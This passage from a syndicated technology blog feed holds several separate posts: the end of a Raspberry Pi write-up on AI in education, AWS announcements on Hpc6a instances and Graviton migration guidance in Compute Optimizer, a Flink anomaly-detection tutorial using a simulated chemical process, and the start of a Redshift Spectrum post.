The sixth step in Rose’s example focused on what may be learned from analysing collected data linked to the particular challenge of online teaching and learning. Rose said that applying an AI system to students’ behavioural data could, for example, give indications about students’ focus and confidence, and make or recommend interventions to educators accordingly.

Presentation slide showing example graphs of results produced by an AI system in education.

Where might we take applications of AI systems in education in the future?

Rose described that AI systems can possess some types of intelligence humans have or can develop: interdisciplinary academic intelligence, meta-knowing intelligence, and potentially social intelligence. However, there are types such as meta-contextual intelligence and perceived self-efficacy that AI systems are not able to demonstrate in the way humans can.

The seven types of human intelligence as defined by Rose Luckin: interdisciplinary academic knowledge, meta-knowing intelligence, social intelligence, metacognitive intelligence, meta-subjective intelligence, meta-contextual knowledge, perceived self-efficacy.

The use of AI systems in education can cause ethical issues. As an example, Rose pointed out the use of virtual glasses to identify when students need help, even if they do not realise it themselves. A system like this could help educators with assessing who in their class needs more help, and could link this back to student performance. However, using such a system like this has obvious ethical implications, and some of these were the focus of the Q&A that followed Rose’s presentation.

It’s clear that, in the education domain as in all other domains, both positive and negative outcomes of integrating AI are possible. In a recent paper written by Wayne Holmes (also from the UCL Knowledge Lab) and co-authors, ‘Ethics of AI in Education: Towards a Community Wide Framework’ [1], the authors suggest that the interpretation of data, consent and privacy, data management, surveillance, and power relations are all ethical issues that should be taken into consideration. Finding consensus for a practical ethical framework or set of principles, with all stakeholders, at the very start of an AI-related project is the only way to ensure ethics are built into the project and the AI system itself from the ground up.

Two boys at laptops in a classroom.

Ethical issues of AI systems more broadly, and how to involve young people in discussions of AI ethics, were the focus of our seminar with Dr Mhairi Aitken back in September. You can revisit the seminar recording, presentation slides, and summary blog post.

I really enjoyed both the focus and content of Rose’s talk: educators understanding how AI systems may be applied to education in order to help them make more informed decisions about how to best support their students. This is an important factor to consider in the context of the bigger picture of what young people should be learning about AI. The work that Rose and her colleagues are doing also makes an important contribution to translating research into practical models that teachers can use.

Join our next free seminars

You may still have time to sign up for our Tuesday 11 January seminar, today at 17:00–18:30 GMT, where we will welcome Dave Touretzky and Fred Martin, founders of the influential AI4K12 framework, which identifies the five big ideas of AI and how they can be integrated into education.

Next month, on 1 February at 17:00–18:30 GMT, Tara Chklovski (CEO of Technovation) will give a presentation called Teaching youth to use AI to tackle the Sustainable Development Goals at our seminar series.

If you want to join any of our seminars, click the button below to sign up and we will send you information on how to join. We look forward to seeing you there!

You’ll always find our schedule of upcoming seminars on this page. For previous seminars, you can visit our past seminars and recordings page.

The post How can AI-based analysis help educators support students? appeared first on Raspberry Pi.

New – Amazon EC2 Hpc6a Instance Optimized for High Performance Computing

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/new-amazon-ec2-hpc6a-instance-optimized-for-high-performance-computing/

High Performance Computing (HPC) allows scientists and engineers to solve complex, compute-intensive problems such as computational fluid dynamics (CFD), weather forecasting, and genomics. HPC applications typically require instances with high memory bandwidth, a low latency, high bandwidth network interconnect and access to a fast parallel file system.

Many customers have turned to AWS to run their HPC workloads. For example, Descartes Labs used AWS to power a TOP500 LINPACK benchmarking (the most powerful commercially available computer systems) run that delivered 1.93 PFLOPS, landing at position 136 on the TOP500 list in June 2019. That run made use of 41,472 cores on a cluster of Amazon EC2 C5 instances. Last year Descartes Labs ran the LINPACK benchmark again and placed within the top 40 on the June 2021 TOP500 list with 172,692 cores on a cluster of EC2 instances, which represents a 417 percent performance increase in just two years.

AWS enables you to increase the speed of research and reduce time-to-results by running HPC in the cloud and scaling to tens of thousands of parallel tasks that wouldn’t be practical in most on-premises environments. AWS helps you reduce costs by providing CPU, GPU, and FPGA instances on-demand, Elastic Fabric Adapter (EFA), an EC2 network device that improves throughput and scaling tightly coupled workloads, and AWS ParallelCluster, an open-source cluster management tool that makes it easy for you to deploy and manage HPC clusters on AWS.

Announcing EC2 Hpc6a Instances for HPC Workloads
Customers today across various industries use compute-optimized EFA-enabled Amazon EC2 instances (for example, C5n, R5n, M5n, and M5zn) to maximize the performance of a variety of HPC workloads, but as these workloads scale to tens of thousands of cores, cost-efficiency becomes increasingly important. We have found that customers are not only looking to optimize performance for their HPC workloads but want to optimize costs as well.

As we pre-announced in November 2021, Hpc6a, a new HPC-optimized EC2 instance, is generally available beginning today. This instance delivers 100 Gbps networking through EFA with 96 third-generation AMD EPYC™ processor (Milan) cores with 384 GB RAM, and offers up to 65 percent better price-performance over comparable x86-based compute-optimized instances.

You can launch Hpc6a instances today in the US East (Ohio) and GovCloud (US-West) Regions in On-Demand and Dedicated Hosting or as part of a Savings Plan. Here are the detailed specs:

Instance Name CPUs* RAM EFA Network Bandwidth Attached Storage
hpc6a.48xlarge 96 384 GiB Up to 100 Gbps EBS Only

*Hpc6a instances have simultaneous multi-threading disabled to optimize for HPC codes. This means that unlike other EC2 instances, Hpc6a vCPUs are physical cores, not threads.

To enable predictable thread performance and efficient scheduling for HPC workloads, simultaneous multi-threading is disabled. Thanks to AWS Nitro System, no cores are held back for the hypervisor, making all cores available to your code.

Hpc6a instances introduce a number of targeted features to deliver cost and performance optimizations for customers running tightly coupled HPC workloads that rely on high levels of inter-instance communications. These instances enable EFA networking bandwidth of 100 Gbps and are designed to efficiently scale large tightly coupled clusters within a single Availability Zone.

We hear from many of our engineering customers, such as those in the automotive sector, that they want to reduce the need for physical testing and move towards an increasingly virtual simulation-based product design process faster at a lower cost.

According to our benchmarking results for Siemens Simcenter STAR-CCM+ automotive CFD simulation, when the Hpc6a scales up to 400 nodes (approximately 40,000 cores), with the help of EFA networking, it is able to maintain approximately 100 percent scaling efficiency. Hpc6a instance shows 70 percent lower cost compared to c5n, meaning companies can deliver new designs faster and at a lower cost when using Hpc6a instances. This means companies can deliver new designs faster and at a lower cost when using Hpc6a instances.

You can use the Hpc6a instance with AMD EPYC third-generation (Milan) processors to run your largest and most complex HPC simulations on EC2 and optimize for cost and performance. Customers can also use the new Hpc6a instances with AWS Batch and AWS ParallelCluster to simplify workload submission and cluster creation.

To learn more, visit our Hpc6a instance page and get in touch with our HPC team, AWS re:Post for EC2, or through your usual AWS Support contacts.

Channy

AWS Compute Optimizer supports AWS Graviton migration guidance

Post Syndicated from Pranaya Anshu original https://aws.amazon.com/blogs/compute/aws-compute-optimizer-supports-aws-graviton-migration-guidance/

This post is written by Letian Feng, Principal Product Manager for AWS Compute Optimizer, and Steve Cole, Senior EC2 Spot Specialist Solutions Architect.

Today, AWS Compute Optimizer is launching a new capability that makes it easier for you to optimize your EC2 instances by leveraging multiple CPU architectures, including x86-based and AWS Graviton-based instances. Compute Optimizer is an opt-in service that recommends optimal AWS resources for your workloads to reduce costs and improve performance by analyzing historical utilization metrics. AWS Graviton processors are custom-built by Amazon Web Services using 64-bit Arm cores to deliver the best price performance for your cloud workloads running in Amazon EC2, with the potential to realize up to 40% better price performance over comparable current generation x86-based instances. As a result, customers interested in Graviton have been asking for a scalable way to understand which EC2 instances they should prioritize in their Graviton migration journey. Starting today, you can use Compute Optimizer to find the workloads that will deliver the biggest return for the smallest migration effort.

How it works

Compute Optimizer helps you find the workloads with the biggest return for the smallest migration effort by providing a migration effort rating. The migration effort rating, ranging from very low to high, reflects the level of effort that might be required to migrate from the current instance type to the recommended instance type, based on the differences in instance architecture and whether the workloads are compatible with the recommended instance type.

Clues about the type of workload running are useful for estimating the migration effort to Graviton. For some workloads, transitioning to Graviton is as simple as updating the instance types and associated Amazon Machine Images (AMIs) directly or in various launch or CloudFormation templates. For other workloads, you might need to use different software versions or change source codes. The quickest and easiest workloads to transition are Linux-based open-source applications. Many open source projects already support Arm64, and by extension Graviton. Therefore, many customers start their Graviton migration journey by checking whether their workloads are among the list of Graviton-compatible applications. They then combine this information with estimated savings from Compute Optimizer to build a list of Graviton migration opportunities.

Because Compute Optimizer cannot see into an instance, it looks to instance attributes for clues about the workload type running on the EC2 instance. The clues Compute Optimizer uses are based on the instance attributes customers provide, such as instance tags, AWS Marketplace product names, AMI names, and CloudFormation templates names. For example, when an instance is tagged with “key:application-type” and “value:hadoop”, Compute Optimizer will identify the application –Apache Hadoop in this example. Then, because we know that major frameworks, such as Apache Hadoop, Apache Spark, and many others, run on Graviton, Compute Optimizer will indicate that there is low migration effort to Graviton, and point customers to documentation that outlines the required steps for migrating a Hadoop application to Graviton.

As another example, when Compute Optimizer sees an instance is using a Microsoft Windows SQL Server AMI, Compute Optimizer will infer that SQL Server is running. Then, because it takes a lot of effort to modernize and migrate a SQL Server workload to Arm, Compute Optimizer will indicate that there is a high migration effort to Graviton. The most effective way to give Compute Optimizer clues about what application is running is by putting an “application-type” tag onto each instance. If Compute Optimizer doesn’t have enough clues, it will indicate that it doesn’t have enough information to offer migration guidance.

The following shows the different levels of migration effort:

  • Very Low – The recommended instance type has the same CPU architecture as the current instance type. Often, customers can just modify instance types directly, or do a simple re-deployment onto the new instance type. So, this is just an optimization, not a migration.
  • Low – The recommended instance type has different CPU architecture from the current instance type, but there’s a low-effort migration path. For example, migrating Apache Hadoop or Redis from x86 to Graviton falls under this category as both Hadoop and Redis have Graviton-compatible versions.
  • Medium – The recommended instance type has different CPU architecture from the current instance type, but Compute Optimizer doesn’t have enough information to offer migration guidance.
  • High – The recommended instance type has different CPU architecture from the current instance type, and the workload has no known compatible version on the recommended CPU architecture. Therefore, customers may need to re-compile their applications or re-platform their workloads (like moving from SQL Server to MySQL).

More and more applications support Graviton every day. If you’re running an application that you know has low migration effort, but Compute Optimizer isn’t yet aware, please tell us! Shoot us an email at [email protected] with the application type, and we’ll update our migration guidance mappings as quickly as we can. You can also put an “application-type” tag on your instances so that Compute Optimizer can infer your application type with high confidence.

Customers who have already opted into Compute Optimizer recommendations will have immediate access to this new capability. Customers who haven’t can opt-in with a single console click or API, enabling all Compute Optimizer features.

Walk through

Now, let’s take a look at how to get started with Graviton recommendation on Compute Optimizer. When you open the Compute Optimizer console, you will see the dashboard page that provides you with a summary of all optimization opportunities in your account. Graviton recommendation is available for EC2 instances and Auto Scaling groups.

Screenshot of Compute Optimizer dashboard page, which shows the number of EC2 instance and Auto Scaling group recommendations by findings in your AWS account.

After you click on View recommendations for EC2 instances, you will come to the EC2 recommendation list view. Here is where you can see a list of your EC2 instances, their current instance type, our finding (over-provisioned, under-provisioned, or optimized), the recommended optimal instance type, and the estimated savings if there is a downsizing opportunity. By default, we will show you the best-fit instance type for the price regardless of CPU architecture. In many cases this means that Graviton will be recommended because EC2 offers a wide selection of Graviton instances with comparatively high price/performance ratio. If you’d like to only look at recommendations with your current architecture, you can use the CPU architecture preference dropdown to tell Compute Optimizer to show recommendations with only the current CPU architecture.

Compute Optimizer EC2 Recommendation List Page. Here you can select both current and Graviton as the preferred CPU architectures. The recommendation list contains two new columns -- migration effort, and inferred workload types.

Here you can see two new columns — Migration effort and Inferred workload types. The Inferred workload types field shows the type of workload Compute Optimizer has inferred your instance is running. The Migration effort field shows how much effort you might need to spend if you migrate from your current instance type to recommended instance type based on the inferred workload type. When there is no change in CPU architecture (i.e. moving from an x86-instance type to another x86-instance type, like in the third row), the migration effort will be Very low. For x86-instances that are running Graviton-compatible applications, such as Apache Hadoop, NGINX, Memcached, etc., when you migrate the instance to Graviton, the effort will be Low. If Compute Optimizer cannot identify the applications, the migration effort from x86 to Graviton will be Medium, and you can provide application type data by putting an application-type tag key onto the instance. You can click on each row to see more detailed recommendation. Let’s click on the first row.

Compute Optimizer EC2 Recommendation Detail Page. The current instance type is r5.large. Recommended option 1 is r6g.large, with low migration effort. Recommended option 2 is t4g.xlarge, with low migration effort. Recommended option 3 is m6g.xlarge, with low migration effort.

Compute Optimizer identifies this instance to be running Apache Hadoop workloads because there’s Amazon EMR system tag associated with it. It shows a banner that details why Compute Optimizer considers this as a low-effort Graviton migration candidate, and offers a migration guide when you click on Learn more.

Github screenshot of AWS Graviton migration guide. The migration guide details steps to transition workloads from x86-based instances to Graviton-based instances.

The same Graviton recommendation can also be retrieved through Compute Optimizer API or CLI. Here’s a sample CLI that retrieves the same recommendation as discussed above:

aws compute-optimizer get-ec2-instance-recommendations --instance-arns arn:aws:ec2:us-west-2:020796573343:instance/i-0b5ec1bb9daabf0f3 --recommendation-preferences "{\"cpuVendorArchitectures\": [\"CURRENT\" , \"AWS_ARM64\"]}"
{
    "instanceRecommendations": [
        {
            "instanceArn": "arn:aws:ec2:us-west-2:000000000000:instance/i-0b5ec1bb9daabf0f3",
            "accountId": "000000000000",
            "instanceName": "Compute Intensive",
            "currentInstanceType": "r5.large",
            "finding": "UNDER_PROVISIONED",
            "findingReasonCodes": [
                "CPUUnderprovisioned",
                "EBSIOPSOverprovisioned"
            ],
            "inferredWorkloadTypes": [
                "ApacheHadoop"
            ],
            "utilizationMetrics": [
                {
                    "name": "CPU",
                    "statistic": "MAXIMUM",
                    "value": 100.0
                },
                {
                    "name": "EBS_READ_OPS_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 0.0
                },
                {
                    "name": "EBS_WRITE_OPS_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 4.943333333333333
                },
                {
                    "name": "EBS_READ_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 0.0
                },
                {
                    "name": "EBS_WRITE_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 880541.9921875
                },
                {
                    "name": "NETWORK_IN_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 18113.96638888889
                },
                {
                    "name": "NETWORK_OUT_BYTES_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 90.37638888888888
                },
                {
                    "name": "NETWORK_PACKETS_IN_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 2.484055555555556
                },
                {
                    "name": "NETWORK_PACKETS_OUT_PER_SECOND",
                    "statistic": "MAXIMUM",
                    "value": 0.3302777777777778
                }
            ],
            "lookBackPeriodInDays": 14.0,
            "recommendationOptions": [
                {
                    "instanceType": "r6g.large",
                    "projectedUtilizationMetrics": [
                        {
                            "name": "CPU",
                            "statistic": "MAXIMUM",
                            "value": 70.76923076923076
                        }
                    ],
                    "platformDifferences": [
                        "Architecture"
                    ],
                    "migrationEffort": "Low",
                    "performanceRisk": 1.0,
                    "rank": 1
                },
                {
                    "instanceType": "t4g.xlarge",
                    "projectedUtilizationMetrics": [
                        {
                            "name": "CPU",
                            "statistic": "MAXIMUM",
                            "value": 33.33333333333333
                        }
                    ],
                    "platformDifferences": [
                        "Hypervisor",
                        "Architecture"
                    ],
                    "migrationEffort": "Low",
                    "performanceRisk": 3.0,
                    "rank": 2
                },
                {
                    "instanceType": "m6g.xlarge",
                    "projectedUtilizationMetrics": [
                        {
                            "name": "CPU",
                            "statistic": "MAXIMUM",
                            "value": 33.33333333333333
                        }
                    ],
                    "platformDifferences": [
                        "Architecture"
                    ],
                    "migrationEffort": "Low",
                    "performanceRisk": 1.0,
                    "rank": 3
                }
            ],
            "recommendationSources": [
                {
                    "recommendationSourceArn": "arn:aws:ec2:us-west-2:000000000000:instance/i-0b5ec1bb9daabf0f3",
                    "recommendationSourceType": "Ec2Instance"
                }
            ],
            "lastRefreshTimestamp": "2021-12-28T11:00:03.576000-08:00",
            "currentPerformanceRisk": "High",
            "effectiveRecommendationPreferences": {
                "cpuVendorArchitectures": [
                    "CURRENT", 
                    "AWS_ARM64"
                ],
                "enhancedInfrastructureMetrics": "Inactive"
            }
        }
    ],
    "errors": []
}

Conclusion

Compute Optimizer Graviton recommendations are available in in US East (Ohio), US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), Europe (Stockholm), and South America (São Paulo) Regions at no additional charge. To get started with Compute Optimizer, visit the Compute Optimizer webpage.

Detect Real-Time Anomalies and Failures in Industrial Processes Using Apache Flink

Post Syndicated from Hubert Asamer original https://aws.amazon.com/blogs/architecture/detect-real-time-anomalies-and-failures-in-industrial-processes-using-apache-flink/

For a long time, industrial control systems were the heart of the manufacturing process which allows collecting, processing, and acting on data from the shop floor. Process manufacturers used a distributed control system (DCS) to do the automated control and operation of an industrial process or plant.

With the convergence of operational technology and information technology (IT), customers such as Yara are integrating their DCS with additional intelligence from the IT side. This provides customers with a holistic view of the different data sources to make more complex decisions with advanced analytics.

In this blog post, we show how to start with advanced analytics on streaming data coming from the shop floor. The sensor data, such as pressure and temperature, is typically published by a DCS. It is then ingested with a local edge gateway and streamed to the cloud with streaming and industrial internet of things (IoT) technology. Analytics on the streaming data is typically done before all data points are stored in the data layer. Figure 1 shows how the data flow can be modeled and visualized with AWS services.

Figure 1: High-level ingestion and analytics architecture

Figure 1: High-level ingestion and analytics architecture

In this example, we are concentrating on the streaming analytics part in the Cloud. We will generate data from a simulated DCS to Amazon Kinesis Data Streams where you have a gateway such as AWS IoT Greengrass and maybe other IoT services in-between.

For the simulated process that the DCS is controlling, we use a well-documented industrial process for creating a chemical compound (acetic anhydride) called the Tennesee Eastman process (TEP). There are several simulations available as open source. We demonstrate how to use this data as a constant stream with more than 30 real-time measurement parameters, ingest to Kinesis Data Streams, and run in-stream analytics using Apache Flink. Within Apache Flink, data is grouped and mapped to the respective stages and parts of the industrial process, and constantly analyzed by calculating anomalies of all process stages. All raw data, plus the derived anomalies and failure patterns, are then ingested from Apache Flink to Amazon Timestream for further use in near real-time dashboards.

Overview of solution

Note: Refer to steps 1 to 6 in Figure 2.

As a starting point for a realistic and data intensive measurement source, we use an already existing (TEP) simulation framework written in C++ originally created from National Institute of Standards and Technology, and published as open source. The GitHub Blog repository contains a small patch which adds AWS connectivity with the software development kits (SDKs) and modifications to the command line arguments. The programs provided by this framework are (step 1) a simulation process starter with configurable starting conditions and timestep configurations and a real-time client (step 2) which connects to the simulation and sends the simulation output data to the AWS Cloud.

Tennesee Eastman process (TEP) background

A paper by Downs & Vogel, A plant-wide industrial process control problem, from 1991 states:

“This chemical standard process consists of a reactor/separator/recycle arrangement involving two simultaneous gas-liquid exothermic reactions.”

“The process produces two liquid products from four reactants. Also present are an inert and a byproduct making a total of eight components. Two additional byproduct reactions also occur. The process has 12 valves available for manipulation and 41 measurements available for monitoring or control.“

The simulation framework used can control all of the 12 valve settings and produces 41 measurement variables with varying sampling frequency.

Data ingestion

The 41 measurement variables, named xmeas_1 to xmeas_41, are emitted by the real-time client (step 2) as key-value JSON messages. The client code is configured to produce 100 messages per second. A built-in C++ Kinesis SDK allows the real-time client to directly stream JSON messages to a Kinesis data stream (step 3).

Figure 2: Detailed system architecture

Figure 2 – Detailed system architecture

Stream processing with Apache Flink

Messages sent to Amazon Kinesis Data Stream are processed in configurable batch sizes by an Apache Flink application, deployed in Amazon Kinesis Data Analytics. Apache Flink is an open-source stream processing framework, written and usable in Java or Scala. As described in Figure 3, it allows the definition of various data sources (for example, a Kinesis data stream) and data sinks for storing processing results. In-between data can be processed by a range of operators—typically mapping and reducing functions (step 4).

In our case, we use a mapping operator where each batch of incoming messages is processed. In Code snippet 1, we apply a custom mapping function to the raw data stream. For rapid and iterative development purposes it’s possible to have the complete stream processing pipeline running in a local Java or Scala IDE such as Maven, Eclipse, or IntelliJ.

Figure 3: Flink execution plan (green: streaming data sources; yellow: data sinks)

Figure 3: Flink execution plan (green: streaming data sources; yellow: data sinks)

public class StreamingJob extends AnomalyDetector {
---
  public static DataStream<String> createKinesisSource
    (StreamExecutionEnvironment env, 
     ParameterTool parameter)
    {
    // create Stream
    return kinesisStream;
  }
---
  public static void main(String[] args) {
    // set up the execution environment
    final StreamExecutionEnvironment env = 
      StreamExecutionEnvironment.getExecutionEnvironment();
---
    DataStream<List<TimestreamPoint>> mainStream =
      createKinesisSource(env, parameter)
      .map(new AnomalyJsonToTimestreamPayloadFn(parameter))
      .name("MaptoTimestreamPayload");
---
    env.execute("Amazon Timestream Flink Anomaly Detection Sink");
  }
}

Code snippet 1: Flink application main class

In-stream anomaly detection

Within the Flink mapping operator, a statistical outlier detection (anomaly detection) is implemented. Flink allows the inclusion of custom libraries within its operators. The library used here is published by AWS—a Random Cut Forest implementation available from GitHub. Random Cut Forest is a well understood statistical method which can operate on batches of measurements. It then calculates an anomaly score for each new measurement by comparing a new value with a cached pool (=forest) of older values.

The algorithm allows the creation of grouped anomaly scores, where a set of variables is combined to calculate a single anomaly score. In the simulated chemical process (TEP), we can group the measurement variables into three process stages:

  1. reactor feed analysis
  2. purge gas analysis
  3. product analysis.

Each group consists of 5–10 measurement variables. We’re getting anomaly scores for a, b, and c. In Code snippet 2 we can learn how an anomaly detector is created. The class AnomalyDetector is instantiated and extended then three times (for our three distinct process stages) within the mapping function as described in Code snippet 3.

Flink distributes this calculation across its worker nodes and handles data deduplication processes within its system.

---
public class AnomalyDetector {
    protected final ParameterTool parameter;
    protected final Function<RandomCutForest, LineTransformer> algorithmInitializer;
    protected LineTransformer algorithm;
    protected ShingleBuilder shingleBuilder;
    protected double[] pointBuffer;
    protected double[] shingleBuffer;
    public AnomalyDetector(
      ParameterTool parameter,
      Function<RandomCutForest,LineTransformer> algorithmInitializer)
    {
      this.parameter = parameter;
      this.algorithmInitializer = algorithmInitializer;
    }
    public List<String> run(Double[] values) {
            if (pointBuffer == null) {
                prepareAlgorithm(values.length);
            }
      return processLine(values);
    }
    protected void prepareAlgorithm(int dimensions) {
---
      RandomCutForest forest = RandomCutForest.builder()
        .numberOfTrees(Integer.parseInt(
          parameter.get("RcfNumberOfTrees", "50")))
        .sampleSize(Integer.parseInt(
          parameter.get("RcfSampleSize", "8192")))
        .dimensions(shingleBuilder.getShingledPointSize())
        .lambda(Double.parseDouble(
          parameter.get("RcfLambda", "0.00001220703125")))
        .randomSeed(Integer.parseInt(
          parameter.get("RcfRandomSeed", "42")))
      .build();
---
    algorithm = algorithmInitializer.apply(forest);
  }

Code snippet 2: AnomalyDetector base class, which gets extended by the streaming applications main class

public class AnomalyJsonToTimestreamPayloadFn extends 
    RichMapFunction<String, List<TimestreamPoint>> {
  protected final ParameterTool parameter;
  private final Logger logger = 

  public AnomalyJsonToTimestreamPayloadFn(ParameterTool parameter) {
    this.parameter = parameter;
  }

  // create new instance of StreamingJob for running our Forest
  StreamingJob overallAnomalyRunner1;
  StreamingJob overallAnomalyRunner2;
  StreamingJob overallAnomalyRunner3;
---

  // use `open`method as RCF initialization
  @Override
  public void open(Configuration parameters) throws Exception {
    overallAnomalyRunner1 = new StreamingJob(parameter);
    overallAnomalyRunner2 = new StreamingJob(parameter);
    overallAnomalyRunner3 = new StreamingJob(parameter);
  super.open(parameters);
}
---

Code snippet 3: Mapping Function uses the Flink RichMapFunction open routine to initialize three distinct Random Cut Forests

Data persistence – Flink data sinks

After all anomalies are calculated, we can decide where to send this data. Flink provides various ready-to-use data sinks. In these examples, we fan out all (raw and processed) data to Amazon Kinesis Data Firehose for storing in Amazon Simple Storage Service (Amazon S3) (long term) (step 5) and to Amazon Timestream (short term) (step 5). Kinesis Data Firehose is configured with a small AWS Lambda function to reformat data from JSON to CSV, and data is stored with automated partitioning to Amazon S3. A Timestream data sink does not come pre-bundled with Flink. A custom Timestream ingestion code is used in these examples. Flink provides extensible operator interfaces for the creation of custom map and sink functions.

Timeseries handling

Timestream, in combination with Grafana, is used for near real-time monitoring. Grafana comes bundled with a Timestream data source plugin and can constantly query and visualize Timestream data (step 6).

Walkthrough

Our architecture is available as a deployable AWS CloudFormation template. The simulation framework comes packed as a docker image, with an option to install it locally on a linux host.

Prerequisites

To implement this architecture, you will need:

  • An AWS account
  • Docker (CE) Engine v18++
  • Java JDK v11++
  • maven v3.6++

We recommend running a local and recent Linux environment. It is assumed that you are using AWS Cloud9, deployed with CloudFormation, within your AWS account.

Steps

Follow these steps to deploy the solution and play with the simulation framework. At the end, detected anomalies derived from Flink are stored next to all raw data in Timestream and presented in Grafana. We’re using AWS Cloud9 and its Linux terminal capabilities here to fire up a Grafana instance, then manually run the simulation to ingest data to Kinesis and optionally manually start the Flink app from the console using Maven.

Deploy stack

After you’re logged in to the AWS Management console you can deploy the CloudFormation stack. This stack creates a fully configured AWS Cloud9 environment with the related GitHub Repo already in place, a Kinesis data stream, Kinesis Data Firehose delivery stream, Kinesis Data Analytics with Flink app deployed, Timestream database, and an S3 bucket.

launch stack button

After successful deployment, record two important facts from the CloudFormation console: the chosen stack name and the attribute 03Cloud9EnvUrl displayed in the Output Section of the stack. The attribute’s URL will take you directly to our deployed AWS Cloud9 environment.

Run post install step within AWS Cloud9

The deployed stack created an AWS Cloud9 environment and an AWS Identity and Access Management (IAM) instance profile. We apply this instance profile to AWS Cloud9 to interact with Kinesis, Timestream, and Amazon S3 throughout the next steps. The used script also configures and installs other required tools.

1.       Open a terminal window.

$ cd flinkAnomalySteps/deployment
$ source c9-postInstall.sh
---SETTING UP IAM INSTANCE PROFILE
Please enter cloudformation stack name (default: flink-rcf-app):
# enter your stack name

Start a Grafana development server

In this section we are starting a Grafana server using docker. Cloud 9 allows us to expose web applications (for demo & development purposes) on container port 8080.

1.       Open a terminal window.

$ cd ../src/grafana-dashboard
$ docker volume create grafana-storage
# this creates a docker volume for persisting your Grafana settings
$./start-grafana.sh
# this starts a recent Grafana using docker with Timestream plugin and a pre-configured dashboard in place

2.       Open the preview panel by selecting Preview, and then select Preview Running Application.

Cloud9 screenshot

3.       Next, in the preview pane, select Pop out into new Window.

Cloud9 screenshot2

4.       A new browser tab with Grafana opens.

5.       Choose any username and password combination.

6.       In Grafana use the “Search dashboards” icon on the left and choose “TEP-SIM-DEV”. This pre-configured dashboard displays data from Amazon Timestream (see step “Open Grafana”).

TEP simulation procedure

Within your local or AWS Cloud9 Linux environment, fetch the simulation docker image from the public AWS container registry, or build the simulation binaries locally, for building manually check the GitHub repo.

Start simulation (in separate terminal)

# starts container and switch into the container-shell
$ docker run -it --rm \
  --network host \
  --name tesim-runner \
  tesim-runner:01 \
 /bin/bash
# then inside container
$ ./tesim --simtime 100  --external-ctrl
# simulation started…

Manipulate simulation (in separate terminal)

Follow the steps here for a basic process disturbance task. Review the aspects of influencing the simulation in the GitHub-Repo. The rtclient program has a range of commands to use for introducing disturbances.

# first switch into running simulation container
$ docker exec -it tesim-runner /bin/bash
# now we can access the shared storage of the simulation process…
$ ./rtclient –setidv 6
# this enables one of the built in process disturbances (1-20)
$ ./rtclient –setidv 7
$ ./rtclient –setidv 8
$ …

Stream Simulation data to Amazon Kinesis DataStream (in separate terminal)

The client has a built-in record frequency of 50 messages per second. One message contains more than 50 measurements, so we have approximately 2,500 measurements per second.

$ ./rtclient -k

AWS libcrypto resolve: found static libcrypto 1.1.1 HMAC symbols
AWS libcrypto resolve: found static libcrypto 1.1.1 EVP_MD symbols
{"xmeas_1": 3649.739476,"xmeas_2": 4451.32071,"xmeas_3": 9.223142558,"xmeas_4": 32.39290913,"xmeas_5": 47.55975621,"xmeas_6": 2798.975688,"xmeas_7": 64.99582601,"xmeas_8": 122.8987929,"xmeas_9": 0.1978264656,…}
# Messages in JSON sent to Kinesis DataStream visible via stdout

Compile and start Flink Application (optional step)

If you want deeper insights into the Flink Application, we can start this as well from the AWS Cloud9 instance. Note: this is only appropriate in development.

$ cd flinkAnomalySteps/src
$ cd flink-rcf-app
$ mvn clean compile
# the Flink app gets compiled
$ mvn exec:java -Dexec.mainClass= \
    "com.amazonaws.services.kinesisanalytics.StreamingJob"
# Flink App is started with default settings in place…
…

Open Grafana dashboard (from the step Start a Grafana development server)

Process anomalies are visible instantly after you start the simulation. Use Grafana to drill down into the data as needed.

/**example - simplest possible Timestream query used for Viz:**/

SELECT CREATE_TIME_SERIES(time, measure_value::double) as anomaly_stream6 FROM "kdaflink"."kinesisdata1"

    WHERE measure_name='anomaly_score_stream6' AND

    time between ago(15m) and now()

Code snippet 4: Timestream SQL example; Timestream database is `kdaflink` – table is `kinesisdata1`

Figure 4 - Grafana dashboard showing near real-time simulation data

Figure 4 – Grafana dashboard showing near real-time simulation data, three anomalies, mapped to the TEP process, are constantly calculated by Flink

S3 raw metrics bucket

For the sake of completeness and potential usefulness, the Flink Application emits all raw data in an intermediate step to Kinesis Data Firehose. The service converts all JSON data to CSV format by using a small AWS Lambda function.

$ aws s3 ls flink-rcf-app-rawmetricsbucket-<CFN-UUID>/tep-raw-csv/2021/11/26/19/

Cleaning up

Delete the deployed CloudFormation stack. All resources (excluding S3 buckets) are permanently deleted.

Conclusion

In this blog post, we learned that in-stream anomaly detection and constant measurement data insights can work together. The Apache Flink framework offers a ready-to-use platform that is mission critical for future adoption across manufacturing and other industries. Other applications of the presented Flink pattern can run on capable edge compute devices. Integration with AWS IoT Greengrass and AWS Greengrass Stream Manager are part of the GitHub Blog repository.

Another extension includes measurement data pattern detection routines, which can coexist with in-stream anomaly detection and can detect specific failure patterns over time using time-windowing features of the Flink framework. You can refer to the GitHub repo which accompanies this blog post. Give it a try and let us know your feedback in the comments!

Define error handling for Amazon Redshift Spectrum data

Post Syndicated from Ahmed Shehata original https://aws.amazon.com/blogs/big-data/define-error-handling-for-amazon-redshift-spectrum-data/

Amazon Redshift is a fully managed, petabyte-scale data warehouse service in the cloud. Amazon Redshift Spectrum allows you to query open format data directly from the Amazon Simple Storage Service (Amazon S3) data lake without having to load the data into Amazon Redshift tables. With Redshift Spectrum, you can query open file formats such as Apache Parquet, ORC, JSON, Avro, and CSV. This feature of Amazon Redshift enables a modern data architecture that allows you to query all your data to obtain more complete insights.

Amazon Redshift has a standard way of handling data errors in Redshift Spectrum. Data file fields containing any special character are set to null. Character fields longer than the defined table column length get truncated by Redshift Spectrum, whereas numeric fields display the maximum number that can fit in the column. With this newly added user-defined data error handling feature in Amazon Redshift Spectrum, you can now customize data validation and error handling.

